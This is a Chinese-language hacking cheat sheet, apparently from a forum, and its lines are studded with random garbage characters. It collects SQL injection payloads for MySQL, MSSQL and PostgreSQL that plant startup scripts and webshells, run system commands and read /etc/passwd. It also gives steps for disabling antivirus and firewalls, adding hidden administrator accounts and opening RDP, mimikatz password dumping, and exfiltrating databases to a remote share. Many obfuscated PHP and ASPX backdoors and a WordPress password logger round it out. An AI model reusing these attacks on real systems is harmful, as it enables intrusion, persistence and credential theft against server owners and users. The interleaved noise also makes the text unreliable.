. P6 h+ h& G5 j8 u( s. Sinsert into a values ("set wshshell=createobject (""wscript.shell"") " );
" x$ w _+ c" P( I- Xinsert into a values ("a=wshshell.run (""cmd.exe /c net user test 123!@#abcABC /add"",0) " );& o3 c( p5 W. k
insert into a values ("b=wshshell.run (""cmd.exe /c net localgroup administrators test /add"",0) " );
. l) v. K, }; y% B: Gselect * from a into outfile "C:\\Documents and Settings\\All Users\\「开始」菜单\\程序\\启动\\a.vbs";) ~3 g2 ?4 S$ ?- s9 I0 H* ~
drop table a;
6 n1 u( a/ k5 ^) |- {6 `& o( f
, G1 }0 o& B% e- H英文版本:
; T* d+ V+ r9 x7 z; t' @. A
' J! p# C) z* \" O! B) |use test;: e) @0 e) b9 A7 O$ p8 {: X( W7 m& I+ x
create table a (cmd text);9 O3 ?% F0 A+ k. T$ W) r* B" r
insert into a values ("set wshshell=createobject (""wscript.shell"") " );
# P& }% N- p, J; l2 J/ n: iinsert into a values ("a=wshshell.run (""cmd.exe /c net user test 123!@#abcABC /add"",0) " );, [% J% Z- J" M# E( N
insert into a values ("b=wshshell.run (""cmd.exe /c net localgroup administrators test /add"",0) " );
9 }, s) w& L) _ ]" \select * from a into outfile "C:\\Documents and Settings\\All Users\\Start Menu\\Programs\\Startup\\a.vbs";7 O- J; l, [5 S5 i+ k9 D
drop table a;
; F4 O8 v" l" j' B. G% |
/ i; Q0 ~( D( q# ccreate table a (cmd BLOB);
- X f8 [3 N5 I( }. M4 R4 vinsert into a values (CONVERT(木马的16进制代码,CHAR));3 o8 X% V$ @% z- {. ~$ _2 U
select * from a into dumpfile 'C:\\Documents and Settings\\All Users\\「开始」菜单\\程序\启动\\mm.exe'. }8 r) W8 v! U4 K5 X
drop table a;: Z3 F5 b. S l
0 q& m! e" w* O9 t/ R0 c记录一下怎么处理变态诺顿0 D& J1 j$ b% O. ^* r
查看诺顿服务的路径' Z+ I' D' t5 s/ W
sc qc ccSetMgr
9 I; Y1 J: D- c9 k然后设置权限拒绝访问。做绝一点。。
% I2 I2 a: O- q: gcacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /d system
6 S7 I* |. i( z# j- o: xcacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /d "CREATOR OWNER"# ? N+ b% C" K r
cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /d administrators9 h. r' s$ ^8 r& D% A% k. ?
cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /d everyone
) c& I$ v9 [% k* T8 _* y: _" b4 Z, X
然后再重启服务器
% Z* l# Y% w1 B. ?3 L. j9 iiisreset /reboot" `4 L' N7 V4 M& u! z
这样就搞定了。。不过完事后。记得恢复权限。。。。" A( \+ K0 ^: Y5 Y4 Q; ?3 X+ |
cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /G system:F
' J: @2 M4 s+ |- Icacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /G "CREATOR OWNER":F
* F! B* S. ^! w5 l. F; Kcacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /G administrators:F- e" }3 i* ]& a+ q
cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /G everyone:F
3 z# ^8 h( W0 Q5 M2 HSELECT '<%eval(request(chr(35)))%>' into [fuck] in 'E:\asp.asp;fuck.xls' 'EXCEL 4.0;' from admin" Z3 j3 r" f) d2 V
- q% u5 v G- {- GEXEC('ma'+'ster..x'+'p_cm'+'dsh'+'ell ''net user''')
4 T3 b7 G. F5 J$ s. A; E6 f
" x2 I. q9 ~7 w8 Fpostgresql注射的一些东西
5 S3 r. S0 D$ ~如何获得webshell% r1 q$ n: X# x T9 X: j- E, E4 o
http://127.0.0.1/postgresql.php?id=1;create%20table%20fuck(shit%20text%20not%20null);
% ?- T8 H8 I* A6 X" V! l1 chttp://127.0.0.1/postgresql.php?id=1;insert into fuck values($$<?php eval($_POST[cmd]);?>$$);
, n6 f# o' V& H$ T1 d/ D. bhttp://127.0.0.1/postgresql.php?id=1;copy%20fuck(shit)%20to%20$$/tmp/test.php$$;
! M* P! w9 }" K5 q; |$ ?# }, k如何读文件
* e- `/ Q( g+ G- shttp://127.0.0.1/postgresql.php?id=1;create table myfile (input TEXT);
3 S* o B0 P( E( D N# s dhttp://127.0.0.1/postgresql.php?id=1;copy myfile from ‘/etc/passwd’;* V1 L& j& d$ M: @3 \
http://127.0.0.1/postgresql.php?id=1;select * from myfile;
+ G |; [4 W, R/ J5 H- S; n3 T5 s1 b
z执行命令有两种方式,一种是需要自定义的lic函数支持,一种是用pl/python支持的。- w. T' Z) T6 b: T6 `6 f5 V
当然,这些的postgresql的数据库版本必须大于8.X
; t6 H' k7 d H+ M \, e创建一个system的函数:* o/ @/ U& P9 P5 L
CREATE FUNCTION system(cstring) RETURNS int AS '/lib/libc.so.6', 'system' LANGUAGE 'C' STRICT
F" U3 }- U6 N7 N. i9 q: j, W! a6 t
- ?, V i& [: ^7 \0 @创建一个输出表:3 c. f8 z! Q) Y" n6 ~5 | b7 Y
CREATE TABLE stdout(id serial, system_out text)
5 v" [. T I5 s: b! |" `$ z4 F' ]) N
执行shell,输出到输出表内:
% S V9 M' F' B' ~; fSELECT system('uname -a > /tmp/test')- b( C2 s0 h" n% T
& f9 o- t/ l9 a% m9 u! m, J
copy 输出的内容到表里面;
5 f: b4 R" ?# X8 Z. A! ]3 ]COPY stdout(system_out) FROM '/tmp/test') ~; Z( N6 e; i) s! T" G' I! j
& d. z# C. y( {" J5 s3 X* C从输出表内读取执行后的回显,判断是否执行成功7 E4 `' K6 J- k) B i) t
+ P# a$ V, t. E' i0 I2 BSELECT system_out FROM stdout
4 P! z6 P. R9 ?下面是测试例子
0 o* X: l; p G1 Q( ~- a, |$ S3 N" d( q
% x. U, B8 i; B7 h2 m# X% q/store.php?id=1; CREATE TABLE stdout(id serial, system_out text) --
. ]' x2 K$ _4 H4 B; {6 A9 q
1 |4 g" ^% i, q# o$ A9 a/store.php?id=1; CREATE FUNCTION system(cstring) RETURNS int AS '/lib/libc.so.6','system' LANGUAGE 'C'
/ P! B0 b% q0 k( m$ A* |# ?: MSTRICT --
, y) y+ d) {" p
: N* ~. k& P( y3 U5 ^& ~/store.php?id=1; SELECT system('uname -a > /tmp/test') --5 J! d& c% G+ M2 l3 Z2 Y& G
7 Q6 |3 a) `5 X5 y! Z# o/store.php?id=1; COPY stdout(system_out) FROM '/tmp/test' --
% r* {1 a/ L) O/ B$ o
$ C" f5 g e& e: Y% P% A/ ?/ C/store.php?id=1 UNION ALL SELECT NULL,(SELECT stdout FROM system_out ORDER BY id DESC),NULL LIMIT 1 OFFSET 1--
! U4 q" T$ y' k; L* ~4 Lnet stop sharedaccess stop the default firewall
9 A$ H/ j5 k2 {5 Jnetsh firewall show show/config default firewall$ W8 y9 y9 D/ e' N4 [# i+ G- w) b
netsh firewall set notifications disable disable the notify when the program is disabled by the default firewall
# J. u0 I& z7 n4 Cnetsh firewall add allowedprogram c:\1.exe Svchost add the program which is allowed by default firewall
' J8 ~7 f6 Q. u( d' V修改3389端口方法(修改后不易被扫出)$ L6 U: |) Q" @) ]7 ]+ D0 |) E" b
修改服务器端的端口设置,注册表有2个地方需要修改
+ B0 v7 _4 F! I2 x* C. J- z4 ?# G8 }8 J% e# u
[HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\TerminalServer\\Wds\\rdpwd\\Tds\\tcp], z) l# i6 x R- J! p
PortNumber值,默认是3389,修改成所希望的端口,比如6000$ C, Z, x1 ^2 Q! J- U1 i4 Z
M; Z( T" _! W! O. b1 R
第二个地方:
( o: r5 E: m: R z+ O# i2 Y[HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server\\WinStations\\RDP-Tcp]
0 M! d8 u7 s% Q$ Q' p3 y& C0 IPortNumber值,默认是3389,修改成所希望的端口,比如6000: h7 p- M; n9 C+ Z; Q. x* A& O% ]
; A0 @3 m& d/ q- h6 P' \
现在这样就可以了。重启系统就可以了
$ Y1 Q, G ]2 A1 n4 b3 y$ k( l; i, n! W8 b. ] k
查看3389远程登录的脚本
8 S4 T) s! e( z6 U4 p保存为一个bat文件$ i' _; B+ y. h- m0 S" i! v+ N! \% k
date /t >>D:\sec\TSlog\ts.log
0 D- ~! H& H _+ O4 l2 Ltime /t >>D:\sec\TSlog\ts.log2 \( K. ~) f7 D0 e1 g' D" M3 \* m
netstat -n -p tcp | find ":3389">>D:\sec\TSlog\ts.log
' N6 ?( w9 r7 w8 v- Estart Explorer
( G) L4 e; d! b; e$ b4 O, q+ `8 g2 Q$ G# l9 u
mstsc的参数:
# R( @$ I, }) z/ x. ^" B& d' q. h5 G- J5 `) x0 ~
远程桌面连接, i; G5 H! m/ v; u% y
6 h+ T2 {" m* S9 D4 ~. j( ]MSTSC [<Connection File>] [/v:<server[:port]>] [/console] [/f[ullscreen]]
4 S9 E* N2 R$ m# ` [/w:<width> /h:<height>] | /Edit"ConnectionFile" | /Migrate | /?" Z q: Y9 k' y9 m: R. [4 X
' W% F1 N7 C9 o: ]9 v( @
<Connection File> -- 指定连接的 .rdp 文件的名称。
0 W# T& h# ~) F' n7 B& q/ [8 W \7 |. f, e* m! D
/v:<server[:port]> -- 指定要连接到的终端服务器。; ?9 Q& K( i, C8 Q$ X+ u
# ]! W0 g3 \: @! H; a
/console -- 连接到服务器的控制台会话。5 M6 Q" l$ c" ]! [: t+ L
" P7 }/ \$ J6 R# A/f -- 以全屏模式启动客户端。- V H O( ?3 B' R, _* T+ W
) u, H9 r* K' j( A% W
/w:<width> -- 指定远程桌面屏幕的宽度。1 G6 Y' N- v, S/ s
8 S/ B5 D, h) P" x
/h:<height> -- 指定远程桌面屏幕的高度。
/ y- c( h# Z `! J: H6 c g9 @1 o
& J, A( x& `# p' p" r1 b6 M/edit -- 打开指定的 .rdp 文件来编辑。0 I% u5 Z! j; U, v3 |1 A w0 B! |9 J
! l& u2 T1 u" ?; K7 O" H/migrate -- 将客户端连接管理器创建的旧版+ }. W4 r1 w7 w X l
连接文件迁移到新的 .rdp 连接文件。
# u* [' ^; T7 h% R& Z6 p9 E. S1 ]0 W
7 M0 S) j3 l. H其中mstsc /console连接的是session 0,而mstsc是另外打开一个虚拟的session,这样的话就是相当与另外登陆计算机。也就是说带console参数连接的是显示器显示的桌面。大家可以试试啊,有的时候用得着的,特别是一些软件就
, D, ?, t+ x9 u, }4 B* V# w+ |2 N6 gmstsc /console /v:124.42.126.xxx 突破终端访问限制数量) T& \- \+ ]) j
2 f1 J% `" Y1 m. g* C! c" }1 V命令行下开启3389
5 t4 `3 S$ a) `2 g knet user asp.net aspnet /add
# R4 \; k0 B. T: r3 I7 L2 Qnet localgroup Administrators asp.net /add
* v+ P+ m" I3 e! s& V" snet localgroup "Remote Desktop Users" asp.net /add6 B8 ~7 f, c" t' c$ {
attrib +h "%SYSTEMDRIVE%\Documents and Settings\asp.net" /S /D
4 f) V4 E8 U/ |5 i2 U/ R& becho Y | reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t reg_dword /d 0
; |( Q; H; o( u9 B8 ^7 S" ?+ oecho Y | reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v AllowTSConnections /t reg_dword /d 11 f8 ^& o$ q# I7 n& z5 H
echo Y | reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v "asp.net" /t REG_DWORD /d 00000000 /f* \8 I P* a* ^7 p; c% _, }; Q
sc config rasman start= auto
, T" @, Q% t/ P7 @: e; g% S: M4 d. E5 \sc config remoteaccess start= auto# j3 C/ C% [" W. W9 c4 T
net start rasman
$ n; w, w$ m* Unet start remoteaccess, F1 A: Z( R" \& |8 M
Media
) Z/ U+ M9 R) r. O3 h7 y<form id="frmUpload" enctype="multipart/form-data"
' d+ W& m% h% p. m7 Qaction="http://www.site.com/FCKeditor/editor/filemanager/upload/php/upload.php?Type=Media" method="post">Upload a new file:<br>
7 L/ W6 h% `* C+ i1 M<input type="file" name="NewFile" size="50"><br>
5 Y1 K' w9 s O7 m<input id="btnUpload" type="submit" value="Upload">' ^& C% k1 B( ~3 `( `' Z
</form>) @6 J) q% ~3 b! t Z+ ], {5 e8 w
% |; g0 s6 g; \6 P- V1 X9 E
control userpasswords2 查看用户的密码
# U: x' ~% I" o) \0 E9 caccess数据库直接导出为shell,前提a表在access中存在。知道网站的真实路径
: Y0 P S0 o! CSELECT '<%execute request("a")%>' into [a] in 'c:\x.asp;a.xls' 'excel 8.0;' from a+ B" H$ t+ }& C" i% _3 C- b
$ P; @! z4 t+ ^9 L6 P; s/ v141、平时手工MSSQL注入的时候如果不能反弹写入,那么大多数都是把记录一条一条读出来,这样太累了,这里给出1条语句能读出所有数据:
% {' I2 L9 j3 n测试1:
- Z4 v- J5 d$ uSELECT top 1 name=STUFF((SELECT ','+[name] FROM sysobjects t where xtype='U' FOR XML PATH('')), 1, 1, '') FROM sysobjects t1- C4 c0 V$ e( h3 {' c; d ]0 L
. J6 v, s0 s0 r测试2:
1 P6 r6 B/ [4 Q4 f+ [' y! C& v: v
# N% b2 b. f4 O z/ mcreate table dirs(paths varchar(100),paths1 varchar(100), id int)! l1 ?7 I% ~$ |% B x2 z
- x" t/ I7 F/ k0 p! f8 Mdelete dirs;insert dirs exec master.dbo.xp_dirtree 'c:\',1,1--
% _& [5 W$ B2 e/ x5 N0 i- i8 C7 k# D, ? t J* \- U# y
SELECT top 1 paths=STUFF((SELECT ','+[paths] FROM dirs FOR XML PATH('')), 1, 1, '') FROM dirs t1" n5 Q& x, |. Q0 f% `
关闭macfee软件的方法://需要system权限,请使用at或psexec –s cmd.exe命令
) R6 A# O5 o1 M- m% @* r可以上传.com类型的文件,如nc.com来绕过macfee可执行限制;+ Q. B- b6 S0 G! t2 @$ c2 w* y
net stop mcafeeframework
5 O# p8 `/ S2 y( Lnet stop mcshield+ C- A. A4 [7 f) d- p- X: u& J
net stop mcafeeengineservice
) u% c$ G5 N1 w0 a5 x! tnet stop mctaskmanager3 U, a# B8 p3 |4 d; l0 F" E
http://www.antian365.com/forum.p ... DU5Nzl8NDY5Mw%3D%3D2 U, B" |+ j4 Q. D" [9 G* ~
; W" P0 m6 e4 N0 [: I G0 O$ F
VNCDump.zip (4.76 KB, 下载次数: 1) ' P3 L s, y1 S" ~4 Y6 j V
密码在线破解http://tools88.com/safe/vnc.php
- M: g+ O1 F' M8 \; U7 v* t1 {* JVNC密码可以通过vncdump 直接获取,通过dos查询[HKEY_LOCAL_MACHINE\SOFTWARE\RealVNC\WinVNC4] 下的Password也可以获取
) U: E8 n/ w$ c9 ]# |
8 r, W- a% h7 u7 e; p) | sexec master..xp_cmdshell 'net user'
" p$ V. b) \+ b4 I( W! _mssql执行命令。
1 r1 n& Y! r/ B获取mssql的密码hash查询
& I% [) ?9 r( W- \7 k) o1 v1 qselect name,password from master.dbo.sysxlogins
& R( a) M" n. C" g4 W: C, k1 y3 A' A
backup log dbName with NO_LOG;
3 F9 t1 r( p& r. i2 A0 C/ g" G1 Bbackup log dbName with TRUNCATE_ONLY;
0 M) C7 t& n2 NDBCC SHRINKDATABASE(dbName);
3 s! X0 B: ~" Z' V+ e) i5 G3 Gmssql数据库压缩
9 O2 @+ s5 O) o5 M. }/ d) ^/ u0 Y3 O0 l3 T2 t
Rar.exe a -ep1 -m0 -v200m E:\web\1.rar E:\webbackup\game_db_201107170400.BAK
" x* _! k' I; l% q' E% g2 ^将game_db_201107170400.BAK文件压缩为1.rar,大小为200M的分卷文件。$ L7 C0 t" a0 q1 ^* f( y S
4 u1 e% B7 v+ O4 C) N0 I) _backup database game to disk='D:\WebSites\game.com\UpFileList\game.bak'& M4 n8 s4 q( J& ?1 r
备份game数据库为game.bak,路径为D:\WebSites\game.com\UpFileList\game.bak7 i$ `5 t* o7 o
( ^( N$ m, A5 b" Q; w p
Discuz!nt35渗透要点:
4 y' b U! R. t7 r% [* q" _(1)访问 网站地址/admin/global/global_templatesedit.aspx?path=../tools/&filename=rss.aspx&templateid=1&templatename=Default9 M* a7 A4 y2 x5 a# s
(2)打开rss.aspx文件,将<%@ Page Inherits="Discuz.Web.UI.RssPage" %>复制到本地备份,然后替换其为<%@ Page Language="Jscript"%><%eval(Request.Item["pass"],"unsafe");%> @1 Q9 Q* e' q$ j) O4 I
(3)保存。
' O2 T# ~" a+ x& c6 s5 h, ^(4)一句话后门地址http://somesite.com.cn/tools/rss.aspx 密码为pass9 ~5 U% w% }! R7 m3 D1 J( {7 |
d:\rar.exe a -r d:\1.rar d:\website\6 a0 T0 N U% z6 u3 l
递归压缩website9 G/ \) \, G, |( O0 j5 l
注意rar.exe的路径- g* q& m+ s" ^ C$ ^
. i3 Q* j" Z/ h# \3 r6 ]$ F<?php
5 q9 E. C4 C- T% |. }6 j( z1 R6 @0 G; M- B5 K
$telok = "0${@eval($_POST[xxoo])}";: h) h8 c j) ~# g) j/ X
! {. B. N3 [; J) @( i5 E# @$username = "123456";
2 x0 d+ a1 y1 d6 W
1 X6 a! k0 `4 r$userpwd = "123456";5 t& d+ T% [7 b e% ?9 N- R
. F7 U3 v! W2 j- w) h$telhao = "123456";$ l) w* ?* F$ N5 d* t
% N4 H2 Z0 Q7 E E$telinfo = "123456";4 y6 |# n1 o' ?# _' d1 [4 J7 ]
5 o6 {7 k+ i# L?>$ n8 K- b! r* D# z8 V& V+ ~
php一句话未过滤插入一句话木马0 [- Y" D, A8 W$ F: _4 ?. {4 F
' ~1 [/ P/ m6 {# z站库分离脱裤技巧8 k! l3 t1 h v O, ]
exec master..xp_cmdshell 'net use \\xx.xx.xx.xx\d$\test "pass" /user:"user"'1 d! p" _% f; K q3 E0 T
exec master..xp_cmdshell 'bcp test.dbo.test out \\xx.xx.xx.xx\d$\test\1.txt -c -Slocalhost -Uuser -Ppass'
9 Z2 u' _+ x4 _6 |! Y条件限制写不了大马,只有一个一句话,其实要实现什么完全够了,只是很不直观方便啊,比如tuo库。
1 W! n2 d! ~: g+ i& J; m这儿利用的是马儿的专家模式(自己写代码)。. ], r/ D2 q+ ?1 A$ R
ini_set('display_errors', 1);
( l/ L z$ O0 s! O( I4 kset_time_limit(0);
, a6 O: ^, t8 j- nerror_reporting(E_ALL);- j E! ]# h2 v7 a4 ?( w$ u3 a. _
$connx = mysql_connect(":/var/tmp/mysql.sock", "forum", "xx!!xx3") or die("Could not connect: " . mysql_error());, `/ u2 F5 \$ @+ W) I: l
mysql_select_db("discuz",$connx) or die("Could not connect: " . mysql_error());) b! i, ~: u5 A( f7 N* Z! m
$result = mysql_query("Select * FROM members",$connx) or die("Could not connect: " . mysql_error());6 i" H+ {; g8 Z/ M: I2 V6 e
$i = 0;
8 y1 |) |+ Y8 Y: L' y$tmp = '';
# j" H' C" D5 F z/ Z1 O8 lwhile ($row = mysql_fetch_array($result, MYSQL_NUM)) {
/ b k; N5 W7 l. z' m7 _# T" w) ` $i = $i+1;
% J, }: a E& M, Y3 Y; J4 w9 G $tmp .= implode("::", $row)."\n";
2 m/ p W/ f0 s/ L$ n if(!($i%500)){//500条写入一个文件5 ^' v1 O, k L
$filename = '/home/httpd/bbs.xxxxx/forumdata/cache/user'.intval($i/500).'.txt';( @$ k( r% K M+ {* i3 ] |( c
file_put_contents($filename,$tmp);
$ z( u& N6 B2 Q1 S+ \ $tmp = '';2 v! I* m: j, h N
}9 _+ R& s# A$ I2 P+ q5 J
}+ R6 h7 [2 F! h0 T
mysql_free_result($result);
; ?2 p3 J; c# t# @! n' L
* B' @, q8 ~/ ~7 q4 z7 W! Q2 f# g. _8 h) l: h: P6 s: v
/ G. ~! o& ?; y# S
//down完后delete8 h2 p+ t4 \0 F6 w5 a
( B" X9 ?+ W) D: |# L
6 F9 n1 \/ N5 z `+ `! t# bini_set('display_errors', 1);
: m9 [1 H$ q b* eerror_reporting(E_ALL);( G' x; `' Y4 O" Z8 ~" T
$i = 0;! B' p: [0 T' w7 o
while($i<32) {
8 b9 L- R( E! E* l/ H* R" K $i = $i+1;
- O; W6 h: N) q' o. B) q% P7 X $filename = '/home/httpd/bbs.xxxx/forumdata/cache/user'.$i.'.txt';
6 v$ a- u. f: D/ [ unlink($filename);0 A, b% U$ L" ?# p7 G
} 1 L! l: ^* y @& O" Y9 ?6 N* ~* |
httprint 收集操作系统指纹0 w$ g1 M- i& d: x: C
扫描192.168.1.100的所有端口1 c' c( ?( A$ @: {+ W
nmap –PN –sT –sV –p0-65535 192.168.1.100/ {* p+ f; g, P! l2 H0 E
host -t ns www.owasp.org 识别的名称服务器,获取dns信息/ f( u& Z3 k1 Q! I r& X; J {5 a
host -l www.owasp.org ns1.secure.net 可以尝试请求用于owasp.org的区域传输
( F1 K+ @7 e% v5 n" oNetcraft的DNS搜索服务,地址http://searchdns.netcraft.com/?host
0 K: ?" J, v# P# \0 W: F6 b% d6 c( C- r) s9 b1 X- D8 W
Domain tools reverse IP: http://www.domaintools.com/reverse-ip/ (需要免费注册)
: T5 n0 j6 y% `7 O
& u; F# X) {: `2 v' E MSN search: http://search.msn.com 语法: "ip:x.x.x.x" (没有引号)3 @. M. X5 ?) @; j9 ?& l
1 N4 }* l! Q ]% O/ |
Webhosting info: http://whois.webhosting.info/ 语法: http://whois.webhosting.info/x.x.x.x, g. W" Q% e0 U6 N6 l# s
( X* y( ^- s8 H4 [9 k2 b
DNSstuff: http://www.dnsstuff.com/ (有多种服务可用)2 | F0 P8 a7 G, H
R; ?; p6 s, U, x8 S/ W. G g
http://net-square.com/msnpawn/index.shtml (要求安装)
2 x% N9 K2 J- z# _8 w; Q
' @$ N! ^9 y2 ~4 {) a tomDNS: http://www.tomdns.net/ (一些服务仍然是非公开的)
/ w. T" {/ A' a1 ~7 x0 Z9 y8 l& `& b) T; L
SEOlogs.com: http://www.seologs.com/ip-domains.html (反向IP/域名查找)! v$ U2 t6 C; P( @: N
set names gb2312% M y N/ \& h; f' Y* J0 d
导入数据库显示“Data too long for column 'username' at row 1”错误。原因是不支持中文。+ ]0 j E% D5 H- U0 U
2 Q; l# R* b" H* L
mysql 密码修改
0 u( J. A1 z# P6 J! K: BUPDATE mysql.user SET password=PASSWORD("newpass") whereuser="mysqladmin ” ( C! E7 p( s; L* \* j# b; y3 L
update user set password=PASSWORD('antian365.com') where user='root';
4 A. n+ Z' c1 G; S! H! c) Tflush privileges;
4 ~/ ~5 P* E7 ^ y9 R+ H* i. `高级的PHP一句话木马后门
" i8 a* ^- Q- ^7 g/ \3 |
! O- X' h8 G- M0 T' t& j入侵过程发现很多高级的PHP一句话木马。记录下来,以后可以根据关键字查杀
+ o! z8 N8 S/ ^: Y( a) @
/ i. a: ^, E9 J3 f1、0 u. } s- y, u) f
, d2 E- I3 ?5 i: c8 `# g8 ]4 ?
$hh = "p"."r"."e"."g"."_"."r"."e"."p"."l"."a"."c"."e";
% i+ q( @5 @8 t! I, ]- K' |$ {( E2 i" U$ }0 Z: T j/ W
$hh("/[discuz]/e",$_POST['h'],"Access");
2 L! X# P4 S* M
- Q$ _& v+ _* ]% u1 S! l//菜刀一句话
+ l4 M7 `' \- R
. `% U! X# D3 l( D2 u+ x$ }2、& v3 v4 w) D. Z$ c% `6 Y/ R
2 Y2 B0 r. A- r( ^$filename=$_GET['xbid'];% s) V; ~9 s r/ n2 a, S
8 [% v: P/ d; s% vinclude ($filename);" A" ~1 d4 R8 ]" v0 }7 K- F/ S
; U) ]/ `+ f0 Q6 K) f8 m y//危险的include函数,直接编译任何文件为php格式运行9 g& m! \7 {! S- V! G$ n
, u& z7 e' h9 N. l5 v9 s& r2 J3、
/ \1 i) r# Q( B, p7 n0 `- E
7 y. y3 `' q8 Y/ J! V4 {$reg="c"."o"."p"."y";( B' `; r, n7 q* A
! e3 ]+ A9 @+ O: ^" ~6 B$reg($_FILES[MyFile][tmp_name],$_FILES[MyFile][name]);
7 p8 \( g* b& J' e5 W: Z. W* ?+ I$ E: N8 e, E+ `; p
//重命名任何文件
: V1 @' W: R, c5 X0 W$ f5 R9 {0 q. H# ^3 ?
4、
: s" d$ ^: {+ d7 q5 m: d' {. H& Z* r3 k* z z3 z! D$ T
$gzid = "p"."r"."e"."g"."_"."r"."e"."p"."l"."a"."c"."e";1 z2 E9 K% Y, V+ V$ j
1 W* h2 R, w8 g8 n$gzid("/[discuz]/e",$_POST['h'],"Access");
+ X' h8 w5 L8 t6 x0 M, s) p
8 }1 F5 I; ?9 _4 j8 C//菜刀一句话7 c( X( h7 k& q* g& B8 x% k+ t
0 ?) I" ?' i. y5 ]# z! \5、include ($uid); v w! N& v2 ^
/ W) I& f% O0 K4 g- N( a9 b* X//危险的include函数,直接编译任何文件为php格式运行,POST [3 u- R1 X. @% `4 J
5 r: Y* u# P! a
, l2 G* H1 j; u# h( w! N p//gif插一句话& T& Z* S5 ]% E8 M. ^9 b" k
; V5 H I8 Z& T/ {- C, |; Q
6、典型一句话0 `/ E, C1 C1 |7 [9 L
( j p" p7 M4 t- E! O% D程序后门代码" ~4 v% v5 B/ M; y; C
<?php eval_r($_POST[sb])?>4 Z6 f5 W# A/ k! o9 }
程序代码7 G% _+ o) q" ~ Z/ G
<?php @eval_r($_POST[sb])?>8 P6 \5 ^6 P/ a* @
//容错代码; P5 {; o, O' r3 W; }5 F' v! l! ~
程序代码
) _& `5 Y0 Q8 Y: b2 F: k& G A<?php assert($_POST[sb]);?>+ x. n i1 y( r0 i3 z2 e b& r
//使用lanker一句话客户端的专家模式执行相关的php语句& V4 s3 z# A* @9 e
程序代码$ o" x7 L. V8 T4 U3 e- K" t; f
<?$_POST['sa']($_POST['sb']);?>
. S; x! x6 F. V! B2 D1 m程序代码
+ _6 e' c+ `: w J5 y<?$_POST['sa']($_POST['sb'],$_POST['sc'])?>1 v* R( W2 Z( T- Y5 p4 ~3 X3 ^
程序代码3 e& a( `4 t$ ?* C2 E9 t
<?php
. T) m" ]- V" ?9 _! [. U! k@preg_replace("/[email]/e",$_POST['h'],"error");
( u: e/ P( E- D I?>2 i+ T8 Z8 L, X
//使用这个后,使用菜刀一句话客户端在配置连接的时候在"配置"一栏输入 d& a# H/ s0 p' Y% O
程序代码
* M! b7 r9 s8 L( g<O>h=@eval_r($_POST[c]);</O>
) X' B& ], B. D, X# g1 e- ~7 e$ J程序代码7 v! R m" G: K% z6 o
<script language="php">@eval_r($_POST[sb])</script>3 v9 P ]: i& Y5 X% P; ~3 T# i
//绕过<?限制的一句话
?& O; L* h9 b2 v3 _# V. |2 q
9 e- O0 d8 F+ v, i- R& D& uhttp://blog.gentilkiwi.com/downloads/mimikatz_trunk.zip
8 ] ]6 ^: s4 L% C详细用法:
/ I" X! J5 _5 e2 }: c0 |1、到tools目录。psexec \\127.0.0.1 cmd( a/ ~- b! }3 p5 Y/ T. p) i4 i
2、执行mimikatz7 l9 w. S2 z7 B; }0 \
3、执行 privilege::debug
2 o3 s5 W5 h4 U, u4 D3 q4、执行 inject::process lsass.exe sekurlsa.dll: `9 B5 D' Q" }( q" }' X/ q
5、执行@getLogonPasswords% Y- D5 D1 i( P4 G
6、widget就是密码. U; t+ Q3 V. G8 Q
7、exit退出,不要直接关闭否则系统会崩溃。3 i" c7 N6 A9 ?" d
; X; F5 u# v* {" m# ahttp://www.monyer.com/demo/monyerjs/ js解码网站比较全面
$ r+ M9 j& g* E+ v: V7 j9 M
" b; l: @2 T) z6 D/ \% M0 x自动查找系统高危补丁
+ R/ c/ U+ [3 ?systeminfo>a.txt&(for %i in (KB2360937 KB2478960 KB2507938 KB2566454 KB2646524 KB2645640 KB2641653 KB944653 KB952004 KB971657 KB2620712 KB2393802 kb942831 KB2503665 KB2592799) do @type a.txt|@find /i "%i"||@echo %i Not Installed!)&del /f /q /a a.txt
" M1 R- ]2 `" o0 ? H; y8 f
: w. ^7 F, L* l0 P7 s* y5 E突破安全狗的一句话aspx后门& l& x4 P8 q% @( k
<%@ Page Language="C#" ValidateRequest="false" %>
7 K- s; G0 G4 j4 h0 O8 N<%try{ System.Reflection.Assembly.Load(Request.BinaryRead(int.Parse(Request.Cookies["你的密码"].Value))).CreateInstance("c", true, System.Reflection.BindingFlags.Default, null, new object[] { this }, null, null); } catch { }%>
' c# K7 c# e2 z6 L1 h H twebshell下记录WordPress登陆密码
* }( M# R* j' {3 ~6 Hwebshell下记录Wordpress登陆密码方便进一步社工4 O& S+ G: A7 P& m
在文件wp-login.php中539行处添加:0 o c# g/ m" `! C9 h
// log password
# w- N& o+ k7 ]. u& S. `$log_user=$_POST['log'];
9 g4 h8 E5 v# ~8 T# M; p& q7 T) k$log_pwd=$_POST['pwd']; j+ V9 ^* u1 W
$log_ip=$_SERVER["REMOTE_ADDR"];1 O( T; i3 p3 T1 M3 b/ f4 ~/ d
$txt=$log_user.’|’.$log_pwd.’|’.$log_ip;7 X% |5 ], S% N
$txt=$txt.”\r\n”;6 l- L' w) i- D: n
if($log_user&&$log_pwd&&$log_ip){; W# {1 C1 ]8 `# N! s+ Z( ?
@fwrite(fopen(‘pwd.txt’,”a+”),$txt);
" L6 R) C3 [- ]* b) v9 _}0 s' r7 w( A0 P
当action=login的时候会触发记录密码code,当然了你也可以在switch…case..语句中的default中写该代码。
: a$ D, j) [$ [! A4 g2 G; u* Q2 ~) z就是搜索case ‘login’! T. J ~% h4 }1 X; T. v
在它下面直接插入即可,记录的密码生成在pwd.txt中,
, M* r5 g) C; [; O% [& A其实修改wp-login.php不是个好办法。容易被发现,还有其他的方法的,做个记录
/ v+ G+ [. |: s; K. t/ z, h M利用II6文件解析漏洞绕过安全狗代码:
